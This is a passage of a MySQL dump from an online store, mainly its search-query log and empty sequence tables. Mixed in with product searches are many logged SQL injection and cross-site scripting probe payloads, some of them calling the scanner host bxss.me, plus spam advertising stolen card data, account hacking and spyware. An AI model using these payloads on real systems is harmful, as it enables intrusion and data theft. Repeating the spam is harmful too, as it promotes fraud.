15:49:09'),(2859,'FAJWJSDPF',0,2,NULL,2,1,1,0,'2022-11-23 15:50:08'),(2861,'FAJWJSDPF',0,2,NULL,1,1,1,0,'2022-11-23 15:53:50'),(2869,'B077MRDYS',0,2,NULL,3,1,1,0,'2022-11-23 17:26:49'),(2873,'B077MRDYS',0,2,NULL,2,1,1,0,'2022-11-23 17:27:26'),(2877,'B077MRDYS',0,2,NULL,1,1,1,0,'2022-11-23 17:29:10'),(2881,'B07D5Y68',0,2,NULL,3,1,1,0,'2022-11-23 17:34:13'),(2885,'B07D5Y68',0,2,NULL,2,1,1,0,'2022-11-23 17:34:48'),(2889,'B07D5Y68',0,2,NULL,1,1,1,0,'2022-11-23 17:36:29'),(2893,'B00L50MK',0,2,NULL,3,1,1,0,'2022-11-23 17:46:56'),(2897,'B00L50MK',0,2,NULL,2,1,1,0,'2022-11-23 17:47:33'),(2901,'B00L50MK',0,2,NULL,1,1,1,0,'2022-11-23 17:49:14'),(2913,'Samsun',0,2,NULL,3,1,1,0,'2022-11-24 09:03:35'),(2917,'Samsun',0,2,NULL,2,1,1,0,'2022-11-24 09:04:15'),(2924,'wingate',0,1,NULL,3,1,1,0,'2022-11-25 03:30:31'),(2931,'Scrub',0,2,NULL,2,1,1,0,'2022-11-29 05:04:10'),(2933,'Facial scrub',0,1,NULL,2,1,1,0,'2022-11-29 05:04:01'),(2948,'bIsF',0,2,NULL,3,1,1,0,'2022-12-15 20:49:55'),(2952,'7648',0,1,NULL,3,1,1,0,'2022-12-15 20:50:00'),(2954,'bIsF(,(,\".(,,\'',0,1,NULL,3,1,1,0,'2022-12-15 20:50:04'),(2956,'bIsF\'qRiASr<\'\">XXeTbK',0,1,NULL,3,1,1,0,'2022-12-15 20:50:08'),(2958,'TBsT',0,2,NULL,1,1,1,0,'2022-12-15 22:11:30'),(2962,'6484',0,1,NULL,1,1,1,0,'2022-12-15 22:11:34'),(2964,'TBsT,(\'.(.,.\"(',0,1,NULL,1,1,1,0,'2022-12-15 22:11:37'),(2966,'TBsT\'guEJYB<\'\">bXMNVL',0,1,NULL,1,1,1,0,'2022-12-15 22:11:41'),(2972,'test',0,1,NULL,4,1,1,0,'2022-12-17 17:54:05'),(2976,'test',0,1,NULL,3,1,1,0,'2022-12-17 17:56:32'),(2978,'test',0,1,NULL,2,1,1,0,'2022-12-17 17:57:33'),(2986,'pqZh',0,2,NULL,2,1,1,0,'2022-12-20 10:16:22'),(2990,'6261',0,1,NULL,2,1,1,0,'2022-12-20 10:16:26'),(2992,'pqZh)).),,).\"\'',0,1,NULL,2,1,1,0,'2022-12-20 10:16:30'),(2994,'pqZh\'vKDgcU<\'\">dRHCft',0,1,NULL,2,1,1,0,'2022-12-20 10:16:33'),(2999,'ITune',0,2,NULL,3,1,1,0,'2022-12-21 10:11:04'),(3003,'ITune',0,2,NULL,2,1,1,0,'2022-12-21 10:11:28'),(3007,'ITune',0,2,NULL,1,1,1,0,'2022-12-21 10:12:46'),(3011,'Amazo',0,2,NULL,3,1,1,0,'2022-12-21 11:33:09'),(3015,'Amazo',0,2,NULL,2,1,1,0,'2022-12-21 11:33:30'),(3025,'Razor bump',0,1,NULL,2,1,1,0,'2023-01-09 08:16:41'),(3032,'iphone',0,1,NULL,3,1,1,0,'2023-01-16 15:10:32'),(3034,'JLI-2555BXZ3',0,1,NULL,3,1,1,0,'2023-01-17 23:19:19'),(3041,'DJI mini 2',20,3,NULL,3,1,1,0,'2023-01-23 10:12:15'),(3042,'vaude',0,1,NULL,3,1,1,0,'2023-01-25 11:56:58'),(3048,'Roland Garros',0,1,NULL,3,1,1,0,'2023-02-03 13:29:28'),(3050,'FC Barcelona',0,1,NULL,3,1,1,0,'2023-02-03 13:29:28'),(3051,'clase azul',0,1,NULL,3,1,1,0,'2023-02-03 13:29:29'),(3053,'Perrelet',0,1,NULL,3,1,1,0,'2023-02-03 13:29:29'),(3069,'Buy WOW Gold, WOW Classic Gold,Buy WOW Classic Gold',6,1,NULL,3,1,1,0,'2023-02-14 17:04:44'),(3072,'ChatGPT register number,【Visit Sig8.com】register ChatGPT online,ChatGPT register,buy ChatGPT accounts online,sign up for ChatGPT',17,1,NULL,3,1,1,0,'2023-02-15 20:11:39'),(3076,'Perfume',0,1,NULL,3,1,1,0,'2023-02-16 12:47:42'),(3087,'Lowa',0,1,NULL,3,1,1,0,'2023-02-24 11:39:01'),(3091,'PARLUX',0,1,NULL,3,1,1,0,'2023-02-25 07:58:04'),(3093,'OLAPLEX',0,1,NULL,3,1,1,0,'2023-02-25 07:58:05'),(3095,'HEINIGER',0,1,NULL,3,1,1,0,'2023-02-25 07:58:06'),(3097,'BABYLISSPRO',0,1,NULL,3,1,1,0,'2023-02-25 07:58:07'),(3098,'ARDELL',0,1,NULL,3,1,1,0,'2023-02-25 07:58:07'),(3100,'PIERRE CARDIN',0,1,NULL,3,1,1,0,'2023-02-25 07:58:07'),(3102,'SMASHBOX',0,1,NULL,3,1,1,0,'2023-02-25 07:58:07'),(3103,'Fenty Beauty',0,1,NULL,3,1,1,0,'2023-02-25 07:58:08'),(3104,'Colourpop',0,1,NULL,3,1,1,0,'2023-02-25 07:58:08'),(3109,'fullz for sale,【Visit Sig8.com】buy cvv2,dump with pin sites,fresh cc dumps,buy cvv cards,best cvv shop 2020,dumps with pin shop,',24,3,NULL,3,1,1,0,'2023-03-30 12:54:50'),(3110,'Fresh cream',3,1,NULL,3,1,1,0,'2023-03-03 22:27:16'),(3111,'Fresh skin',14,1,NULL,3,1,1,0,'2023-03-03 22:27:17'),(3112,'Fresh firm',1,1,NULL,3,1,1,0,'2023-03-03 22:27:17'),(3113,'Fresh mask',1,1,NULL,3,1,1,0,'2023-03-03 22:27:17'),(3114,'Lancôme',0,1,NULL,3,1,1,0,'2023-03-03 22:27:16'),(3115,'Fresh smooth',9,1,NULL,3,1,1,0,'2023-03-03 22:27:17'),(3117,'Dior',0,1,NULL,3,1,1,0,'2023-03-03 22:27:17'),(3119,'Kiehl’s',0,1,NULL,3,1,1,0,'2023-03-03 22:27:17'),(3120,'Valentino perfume',0,1,NULL,3,1,1,0,'2023-03-03 22:27:17'),(3123,'Fresh face',11,1,NULL,3,1,1,0,'2023-03-03 22:27:18'),(3133,'Buy WOW Gold, WOW Classic Gold,Buy WOW Classic Gold',0,3,NULL,2,1,1,0,'2024-04-02 01:01:39'),(3135,'Buy WOW Gold, WOW Classic Gold,Buy WOW Classic Gold',6,1,NULL,1,1,1,0,'2023-03-14 13:37:23'),(3136,'Hokaido Butterfly Safety Razor',28,9,NULL,3,1,1,0,'2023-03-17 08:20:59'),(3151,'Shaving Razor,',28,1,NULL,3,1,1,0,'2023-03-17 08:21:23'),(3153,'napoleon',0,3,NULL,3,1,1,0,'2023-03-31 08:09:01'),(3167,'Buy+WOW+Gold,+WOW+Classic+Gold,Buy+WOW+Classic+Gold',0,26,NULL,2,1,1,0,'2024-04-27 20:00:39'),(3182,'Shaving Razors',28,1,NULL,3,1,1,0,'2023-03-26 19:16:12'),(3186,'spiritual candle molds,【Visit Erqchina.com】tig weld cast aluminum,gieske custom metal fabricators,direct rapid tooling,silicone ',0,1,NULL,2,1,1,0,'2023-03-28 00:58:42'),(3193,'日博365博彩,【访问K3666.cc】沙龙娱乐网,上海快三形态走势一定,全民斗地主天天真人斗地主,沙龙365网站,三人斗地主在线,热博rb88体育app下载,山东体彩网官网,沙巴电竞网址,日博注册送68彩金,上海福彩网,....bf6d',0,1,NULL,1,1,1,0,'2023-03-30 17:57:33'),(3195,'shaving brush',17,1,NULL,3,1,1,0,'2023-03-31 01:26:20'),(3208,'가평출장마사지,【[O1O`6291`2115  100%후불제 전국24출장샵 업계 1위】횡성출장마사지,철원출장마사지,춘천출장마사지,....b7e7',0,1,NULL,2,1,1,0,'2023-04-02 04:53:42'),(3214,'pea,  nt-hljx.com ,falafel,kale,potato,tart,curry,squid,pho,pie,sweet potato,quesadilla,....ee10',0,1,NULL,1,1,1,0,'2023-04-05 11:45:35'),(3216,'add',0,1,NULL,1,1,1,0,'2024-01-08 12:51:20'),(3218,'PROPEL+ADVANCED+PRO+0',0,4,NULL,3,1,1,0,'2024-04-26 21:51:53'),(3222,'Fresh+mask',0,4,NULL,3,1,1,0,'2024-04-18 00:06:38'),(3224,'Fresh+smooth',0,4,NULL,3,1,1,0,'2024-04-23 11:35:42'),(3229,'hair+bump',0,6,NULL,3,1,1,0,'2024-04-27 19:32:26'),(3231,'DJI+mini+2',0,6,NULL,3,1,1,0,'2024-04-23 19:49:01'),(3233,'Fresh+skin',0,4,NULL,3,1,1,0,'2024-04-23 19:35:40'),(3235,'Shaving+cream',0,5,NULL,3,1,1,0,'2024-04-23 10:50:50'),(3237,'Shaving+Razors',0,6,NULL,3,1,1,0,'2024-04-26 21:56:05'),(3239,'razor+bump+solution',0,3,NULL,3,1,1,0,'2024-04-13 11:01:56'),(3241,'Dr.+Feel+Good',0,3,NULL,3,1,1,0,'2024-04-03 02:09:07'),(3243,'imperial+touch',0,4,NULL,3,1,1,0,'2024-04-24 02:42:03'),(3245,'palm+springs',0,5,NULL,3,1,1,0,'2024-04-24 02:46:00'),(3248,'razor+pouch',0,8,NULL,3,1,1,0,'2024-04-27 07:25:28'),(3252,'Shaving+gel',0,6,NULL,3,1,1,0,'2024-04-23 08:48:42'),(3257,'forest+glen',0,7,NULL,3,1,1,0,'2024-04-26 00:37:57'),(3259,'Luxe+Moisture+Shave+Gel+8+oz.',0,4,NULL,3,1,1,0,'2024-04-27 10:45:42'),(3261,'Fresh+firm',0,6,NULL,3,1,1,0,'2024-04-20 20:02:26'),(3263,'razor+bump',0,6,NULL,3,1,1,0,'2024-04-19 19:55:53'),(3265,'Razor+Bump+Solution+4+oz.',0,3,NULL,3,1,1,0,'2024-04-09 03:07:53'),(3267,'REV+PRO+MIPS',0,4,NULL,3,1,1,0,'2024-04-25 10:39:02'),(3269,'REVOLT+E++[PRO/500WH]',0,2,NULL,3,1,1,0,'2024-04-23 09:42:11'),(3272,'Ingrown+hair',0,7,NULL,3,1,1,0,'2024-04-28 08:18:27'),(3275,'TOUGHROAD+SLR+EX',0,5,NULL,3,1,1,0,'2024-04-21 10:11:03'),(3277,'Shaving+Razor,',0,5,NULL,3,1,1,0,'2024-04-16 06:23:24'),(3281,'Fresh+cream',0,5,NULL,3,1,1,0,'2024-04-18 14:01:56'),(3283,'Hokaido+Butterfly+Safety+Razor',0,3,NULL,3,1,1,0,'2024-04-20 14:11:02'),(3290,'Fresh+face',0,6,NULL,3,1,1,0,'2024-04-24 11:30:53'),(3293,'shaving+brush',0,4,NULL,3,1,1,0,'2024-04-24 08:43:17'),(3296,'shave+gel',0,6,NULL,1,1,1,0,'2024-03-30 02:38:10'),(3300,'<a+HrEF=:>',0,5,NULL,1,1,1,0,'2024-04-21 18:50:56'),(3302,'silver+chill+black',0,7,NULL,1,1,1,0,'2024-04-29 11:08:54'),(3305,'Search+entire+store+here...;SELECT+PG_SLEEP(5)--',0,7,NULL,1,1,1,0,'2024-04-28 14:08:51'),(3314,'q+ORDER+BY+100',0,4,NULL,1,1,1,0,'2024-04-12 22:09:19'),(3316,'shaving+soap',0,5,NULL,1,1,1,0,'2024-04-16 12:02:13'),(3320,'Search+entire+store+here...;WAITFOR+DELAY+\'0:0:5\'--',0,4,NULL,1,1,1,0,'2024-04-01 14:17:25'),(3322,'Search+entire+store+here...)+ORDER+BY+1--+UNQG',0,6,NULL,1,1,1,0,'2024-04-18 13:21:21'),(3327,'1+waitfor+delay+\'0:0:15\'+--',0,7,NULL,1,1,1,0,'2024-04-08 10:54:02'),(3332,'Search+entire+store+here...);SELECT+PG_SLEEP(5)--',0,6,NULL,1,1,1,0,'2024-04-19 08:44:54'),(3334,'Search+entire+store+here...',0,8,NULL,1,1,1,0,'2024-04-25 18:28:19'),(3336,'Search+entire+store+here...+ORDER+BY+1--+DedE',0,5,NULL,1,1,1,0,'2024-04-21 01:07:51'),(3338,'Buy+WOW+Gold,+WOW+Classic+Gold,Buy+WOW+Classic+Gold',0,4,NULL,1,1,1,0,'2024-04-25 05:27:05'),(3340,'Search+entire+store+here...\'+ORDER+BY+1--+kzCB',0,1,NULL,1,1,1,0,'2024-02-19 23:24:04'),(3342,'the<esi:include+src=\"http://bxss.me/rpb.png\"/>',0,6,NULL,1,1,1,0,'2024-04-13 08:17:13'),(3346,'Search+entire+store+here...+WAITFOR+DELAY+\'0:0:5\'',0,4,NULL,1,1,1,0,'2024-04-12 01:26:25'),(3352,'Search+entire+store+here...\');SELECT+PG_SLEEP(5)--',0,1,NULL,1,1,1,0,'2024-02-20 03:04:38'),(3354,'<a+HrEF=http://xss.bxss.me></a>',0,6,NULL,1,1,1,0,'2024-04-25 19:37:56'),(3357,'Razor+Bump+Solution',0,8,NULL,1,1,1,0,'2024-04-23 16:41:53'),(3359,'Search+entire+store+here...\';SELECT+PG_SLEEP(5)--',0,1,NULL,1,1,1,0,'2024-02-20 03:50:04'),(3363,'Search+entire+store+here...+ORDER+BY+1--+tXKA',0,5,NULL,1,1,1,0,'2024-04-17 08:48:48'),(3365,'Search+entire+store+here...\')+ORDER+BY+1--+qozy',0,1,NULL,1,1,1,0,'2024-02-20 08:00:36'),(3367,'\"></meta><img+src+onerror=&emsp;prompt`${1}`>',0,1,NULL,3,1,1,0,'2024-02-25 03:09:31'),(3369,'\"></meta><marquee+loop=1+width=0+onfinish=prompt(1)>',0,4,NULL,3,1,1,0,'2024-04-26 21:53:16'),(3375,'\"></meta><object+data=\':alert(1)\'>',0,2,NULL,3,1,1,0,'2024-03-27 00:59:10'),(3377,'Buy+WOW+Gold,+WOW+Classic+Gold,Buy+WOW+Classic+Gold',0,3,NULL,3,1,1,0,'2024-04-16 03:06:16'),(3379,'\"></meta><ImG+src=z+oNeRror=alert(1)>',0,3,NULL,3,1,1,0,'2024-04-15 22:02:12'),(3381,'\"></meta><object	data=:alert(1)>',0,1,NULL,3,1,1,0,'2024-02-25 16:07:12'),(3383,'REIGN+E++0+[MULLET/PRO/750WH]',0,4,NULL,3,1,1,0,'2024-04-24 01:34:32'),(3385,'\"></meta><img+src=k+onerror=prompt`1`>',0,2,NULL,3,1,1,0,'2024-04-07 01:01:15'),(3388,'\"></meta><details+open+ontoggle=confirm(1)>',0,5,NULL,3,1,1,0,'2024-04-22 16:49:47'),(3391,'\"></meta><object+data=\":alert(1)\">',0,5,NULL,3,1,1,0,'2024-04-25 10:40:28'),(3394,'\"></meta><iFrAme+src=\":alert(1);\"></iframe>',0,4,NULL,3,1,1,0,'2024-04-13 03:21:46'),(3396,'Search+entire+store+here...)+AND+5367=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(86)||CHR(69),5)+AND+(5020=5020',0,6,NULL,1,1,1,0,'2024-04-19 12:30:19'),(3398,'Search+entire+store+here...+AND+5725=7352--+FFUp',0,7,NULL,1,1,1,0,'2024-04-27 19:53:27'),(3400,'Search+entire+store+here...+AND+7242=7242',0,6,NULL,1,1,1,0,'2024-04-29 16:36:21'),(3402,'Search+entire+store+here...\';WAITFOR+DELAY+\'0:0:5\'--',0,5,NULL,1,1,1,0,'2024-04-10 19:10:42'),(3404,'Search+entire+store+here...+AND+5367=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(86)||CHR(69),5)',0,2,NULL,1,1,1,0,'2024-04-03 04:46:46'),(3410,'Search+entire+store+here...+WAITFOR+DELAY+\'0:0:5\'--+WGqB',0,7,NULL,1,1,1,0,'2024-04-28 10:53:04'),(3412,'Search+entire+store+here...+AND+1837=1837--+VeRE',0,4,NULL,1,1,1,0,'2024-04-14 07:57:21'),(3414,'Search+entire+store+here...+AND+3617=1271',0,5,NULL,1,1,1,0,'2024-04-18 16:28:43'),(3419,'Search+entire+store+here...\'+AND+6116=9911+AND+\'CoPL\'=\'CoPL',0,1,NULL,1,1,1,0,'2024-03-01 04:38:43'),(3421,'Search+entire+store+here...)+AND+6803=1563+AND+(3153=3153',0,4,NULL,1,1,1,0,'2024-04-17 21:48:56'),(3423,'Search+entire+store+here...\'+AND+8043=7912+AND+\'NIQO\'=\'NIQO',0,1,NULL,1,1,1,0,'2024-03-01 05:30:15'),(3425,'Search+entire+store+here...%\'+AND+9466=4097+AND+\'%\'=\'',0,1,NULL,1,1,1,0,'2024-03-01 05:50:13'),(3427,'Search+entire+store+here...\'tOJRqA<\'\">TKIOML',0,4,NULL,1,1,1,0,'2024-04-24 23:04:57'),(3429,'Search+entire+store+here....(),.\')\",.',0,5,NULL,1,1,1,0,'2024-04-19 11:26:46'),(3431,'Search+entire+store+here...+AND+1201=3293',0,8,NULL,1,1,1,0,'2024-04-29 20:46:01'),(3435,'Search+entire+store+here...);WAITFOR+DELAY+\'0:0:5\'--',0,7,NULL,1,1,1,0,'2024-04-26 00:33:58'),(3437,'Search+entire+store+here...+AND+3596=CAST((CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113))||(SELECT+(CASE+WHEN+(3596=3596)+THE',0,6,NULL,1,1,1,0,'2024-04-28 22:54:14'),(3439,'Search+entire+store+here...)+AND+9834=(SELECT+9834+FROM+PG_SLEEP(5))+AND+(5013=5013',0,4,NULL,1,1,1,0,'2024-04-20 02:54:51'),(3441,'Search+entire+store+here...\'mhnMaU<\'\">MMfHnj',0,4,NULL,1,1,1,0,'2024-04-07 10:14:21'),(3447,'Search+entire+store+here...+AND+(SELECT+1860+FROM+(SELECT(SLEEP(5)))IItI)--+HyEF',0,4,NULL,1,1,1,0,'2024-04-01 09:09:10'),(3451,'(SELECT+(CASE+WHEN+(3260=3260)+THEN+\'Search+entire+store+here...\'+ELSE+(SELECT+5350+UNION+SELECT+1102)+END))',0,5,NULL,1,1,1,0,'2024-04-14 05:23:26'),(3455,'Search+entire+store+here...))\').,.)\",',0,3,NULL,1,1,1,0,'2024-03-31 09:36:09'),(3461,'Search+entire+store+here...)+AND+8062=7843+AND+(9549=9549',0,7,NULL,1,1,1,0,'2024-04-28 05:51:27'),(3465,'Search+entire+store+here...\'+AND+9118=9244+AND+\'MtCE\'=\'MtCE',0,1,NULL,1,1,1,0,'2024-03-01 14:36:36'),(3467,'Search+entire+store+here...+AND+1837=1837',0,5,NULL,1,1,1,0,'2024-04-23 00:31:00'),(3469,'Search+entire+store+here...)+AND+1837=1837+AND+(1405=1405',0,5,NULL,1,1,1,0,'2024-04-02 06:31:23'),(3475,'Search+entire+store+here...+AND+9834=(SELECT+9834+FROM+PG_SLEEP(5))',0,2,NULL,1,1,1,0,'2024-03-08 10:59:24'),(3477,'Search+entire+store+here...\'+AND+7242=7242+AND+\'biMr\'=\'biMr',0,1,NULL,1,1,1,0,'2024-03-01 17:15:15'),(3482,'Search+entire+store+here...%\'+AND+7242=7242+AND+\'%\'=\'',0,1,NULL,1,1,1,0,'2024-03-01 20:36:57'),(3484,'Search+entire+store+here...\');WAITFOR+DELAY+\'0:0:5\'--',0,3,NULL,1,1,1,0,'2024-04-22 12:00:43'),(3490,'Search+entire+store+here...)+AND+7242=7242+AND+(6874=6874',0,4,NULL,1,1,1,0,'2024-04-16 11:46:41'),(3494,'(SELECT+(CASE+WHEN+(7694=3481)+THEN+\'Search+entire+store+here...\'+ELSE+(SELECT+3481+UNION+SELECT+7299)+END))',0,3,NULL,1,1,1,0,'2024-03-23 23:18:17'),(3498,'Search+entire+store+here...)+AND+(SELECT+1860+FROM+(SELECT(SLEEP(5)))IItI)+AND+(3731=3731',0,7,NULL,1,1,1,0,'2024-04-19 05:25:21'),(3500,'Search+entire+store+here...)+WAITFOR+DELAY+\'0:0:5\'+AND+(3057=3057',0,4,NULL,1,1,1,0,'2024-04-27 05:53:10'),(3502,'(SELECT+(CASE+WHEN+(4956=4450)+THEN+\'Search+entire+store+here...\'+ELSE+(SELECT+4450+UNION+SELECT+3782)+END))',0,4,NULL,1,1,1,0,'2024-04-26 16:34:48'),(3504,'Search+entire+store+here...)+AND+7476=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113)||',0,4,NULL,1,1,1,0,'2024-04-19 01:17:40'),(3508,'1000+yen+itunes+card,【Visit+Coinsnight.com】to+buy+Apple+card,+【100$+card=10$.】itunes+card+50+euro,itunes+gift+voucher,itunes+car',0,24,NULL,2,1,1,0,'2024-04-27 05:59:26'),(3510,'1000 yen itunes card,【Visit Coinsnight.com】to buy Apple card, 【100$ card=10$.】itunes card 50 euro,itunes gift voucher,itunes car',0,20,NULL,2,1,1,0,'2024-04-27 05:59:08'),(3512,'Search+entire+store+here...)+AND+3596=CAST((CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113))||(SELECT+(CASE+WHEN+(3596=3596)+TH',0,7,NULL,1,1,1,0,'2024-04-23 19:52:03'),(3514,'Search+entire+store+here...+AND+EXTRACTVALUE(3181,CONCAT(0x5c,0x716a767a71,(SELECT+(ELT(3181=3181,1))),0x71707a7171))--+XFMu',0,5,NULL,1,1,1,0,'2024-04-28 19:21:07'),(3516,'2024',0,30,NULL,2,1,1,0,'2024-04-29 12:37:42'),(3518,'Search+entire+store+here...)+AND+EXTRACTVALUE(3181,CONCAT(0x5c,0x716a767a71,(SELECT+(ELT(3181=3181,1))),0x71707a7171))+AND+(3803',0,4,NULL,1,1,1,0,'2024-04-26 19:40:32'),(3524,'Search+entire+store+here...+AND+7476=(SELECT+UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(106)||CHR(118)||CHR(122)||CHR(113)||(',0,6,NULL,1,1,1,0,'2024-04-25 01:55:40'),(3528,'Search+entire+store+here...)+AND+8756+IN+(SELECT+(CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT+(CASE+WHEN+(8756=875',0,2,NULL,1,1,1,0,'2024-04-27 05:22:40'),(3537,'Search+entire+store+here...+AND+9834=(SELECT+9834+FROM+PG_SLEEP(5))--+MeaK',0,7,NULL,1,1,1,0,'2024-04-29 08:02:11'),(3559,'(SELECT+CONCAT(CONCAT(\'qjvzq\',(CASE+WHEN+(8258=8258)+THEN+\'1\'+ELSE+\'0\'+END)),\'qpzqq\'))',0,6,NULL,1,1,1,0,'2024-04-23 16:45:40'),(3563,'2023',0,25,NULL,2,1,1,0,'2024-04-29 10:41:41'),(3569,'Search+entire+store+here...+AND+5367=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(90)||CHR(86)||CHR(69),5)--+PzFC',0,4,NULL,1,1,1,0,'2024-04-19 20:17:12'),(3579,'Search+entire+store+here...+AND+(SELECT+1860+FROM+(SELECT(SLEEP(5)))IItI)',0,4,NULL,1,1,1,0,'2024-04-07 22:25:29'),(3581,'rejuvenating eye get',0,1,NULL,2,1,1,0,'2024-03-09 04:46:12'),(3585,'Search+entire+store+here...);SELECT+DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(109)||CHR(113)||CHR(75),5)+FROM+DUAL--',0,4,NULL,1,1,1,0,'2024-04-24 01:56:46'),(3609,'rejuvenating+eye+get',0,6,NULL,2,1,1,0,'2024-04-21 11:04:50'),(3648,'Search+entire+store+here...+AND+EXTRACTVALUE(3181,CONCAT(0x5c,0x716a767a71,(SELECT+(ELT(3181=3181,1))),0x71707a7171))',0,5,NULL,1,1,1,0,'2024-04-24 14:42:27'),(3656,'insta hack without verification,【TelegramChannel:Kunghac】get insta hacking app,insta account hack tools,insta password cracker d',0,2,NULL,3,1,1,0,'2024-03-13 12:19:46'),(3688,'shop',0,8,NULL,1,1,1,0,'2024-04-28 09:26:49'),(3692,'Search+entire+store+here...+AND+5117=5117',0,1,NULL,1,1,1,0,'2024-03-14 10:37:28'),(3696,'Search+entire+store+here...+AND+1075=4070',0,1,NULL,1,1,1,0,'2024-03-15 00:17:18'),(3738,'snapscore hack iphone,【2024 TelegramChannel:Kunghac】  hacking snapchat free,hack snapchat account online,premium snapchat hack,s',0,4,NULL,3,1,1,0,'2024-03-19 08:26:46'),(3740,'my snapchat has been hacked,【2024 TelegramChannel:Kunghac】  easy way to hack snapchat,snapchat hack login,snapchat username hack',0,2,NULL,3,1,1,0,'2024-03-19 09:41:47'),(3790,'snapscore hack 2022,【2024 TelegramChannel:Kunghac】  snapbreaker com,snap on tools hacked,hack someone snapchat 2021,hack someone',0,2,NULL,2,1,1,0,'2024-03-20 03:38:20'),(3876,'Search+entire+store+here...+AND+8756+IN+(SELECT+(CHAR(113)+CHAR(106)+CHAR(118)+CHAR(122)+CHAR(113)+(SELECT+(CASE+WHEN+(8756=8756',0,4,NULL,1,1,1,0,'2024-04-25 08:14:13'),(3929,'\"></meta><frameset><frame+src=\":alert(1);\"></frame>',0,2,NULL,3,1,1,0,'2024-04-03 02:15:19'),(3937,'Search+entire+store+here...;SELECT+DBMS_PIPE.RECEIVE_MESSAGE(CHR(88)||CHR(109)||CHR(113)||CHR(75),5)+FROM+DUAL--',0,2,NULL,1,1,1,0,'2024-04-03 00:36:27'),(3959,'spy software for windows 10 free,【2024 TelegramChannel:Kunghac】apps that spy on your phone,umobix installation,secret video reco',0,2,NULL,2,1,1,0,'2024-03-27 23:19:06'),(4023,'\"></meta><input+autofocus+onfocus+=top[(9350252040-8).toString(40-10)](/1_/)>',0,4,NULL,3,1,1,0,'2024-04-22 14:02:40'),(4111,'Bump',0,1,NULL,3,1,1,0,'2024-04-02 13:56:54'),(4417,'ChatGPT+register+number,【Visit+Sig8.com】register+ChatGPT+online,ChatGPT+register,buy+ChatGPT+accounts+online,sign+up+for+ChatGPT',0,2,NULL,3,1,1,0,'2024-04-20 06:04:36'),(4441,'2025',0,7,NULL,2,1,1,0,'2024-04-30 03:02:43'),(4613,'2024',0,5,NULL,3,1,1,0,'2024-04-29 03:32:20'),(4691,'2025',0,3,NULL,3,1,1,0,'2024-04-29 05:23:52');

--
-- Table structure for table `search_synonyms`
--

CREATE TABLE `search_synonyms` (
  `group_id` bigint unsigned NOT NULL COMMENT 'Synonyms Group ID',
  `synonyms` text NOT NULL COMMENT 'list of synonyms making up this group',
  `store_id` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Store ID - identifies the store view these synonyms belong to',
  `website_id` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Website ID - identifies the website ID these synonyms belong to'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='table storing various synonyms groups';

--
-- Dumping data for table `search_synonyms`
--


--
-- Table structure for table `sendfriend_log`
--

CREATE TABLE `sendfriend_log` (
  `log_id` int unsigned NOT NULL COMMENT 'Log ID',
  `ip` bigint unsigned NOT NULL DEFAULT '0' COMMENT 'Customer IP address',
  `time` int unsigned NOT NULL DEFAULT '0' COMMENT 'Log time',
  `website_id` smallint unsigned NOT NULL DEFAULT '0' COMMENT 'Website ID'
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Send to friend function log storage table';

--
-- Dumping data for table `sendfriend_log`
--


--
-- Table structure for table `sequence_creditmemo_0`
--

CREATE TABLE `sequence_creditmemo_0` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_creditmemo_0`
--


--
-- Table structure for table `sequence_creditmemo_1`
--

CREATE TABLE `sequence_creditmemo_1` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_creditmemo_1`
--

INSERT INTO `sequence_creditmemo_1` VALUES (1),(2),(3);

--
-- Table structure for table `sequence_creditmemo_2`
--

CREATE TABLE `sequence_creditmemo_2` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_creditmemo_2`
--


--
-- Table structure for table `sequence_creditmemo_3`
--

CREATE TABLE `sequence_creditmemo_3` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_creditmemo_3`
--


--
-- Table structure for table `sequence_creditmemo_4`
--

CREATE TABLE `sequence_creditmemo_4` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_creditmemo_4`
--


--
-- Table structure for table `sequence_invoice_0`
--

CREATE TABLE `sequence_invoice_0` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_invoice_0`
--


--
-- Table structure for table `sequence_invoice_1`
--

CREATE TABLE `sequence_invoice_1` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_invoice_1`
--

INSERT INTO `sequence_invoice_1` VALUES (1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19);

--
-- Table structure for table `sequence_invoice_2`
--

CREATE TABLE `sequence_invoice_2` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_invoice_2`
--


--
-- Table structure for table `sequence_invoice_3`
--

CREATE TABLE `sequence_invoice_3` (
  `sequence_value` int unsigned NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

--
-- Dumping data for table `sequence_invoice_3`
--

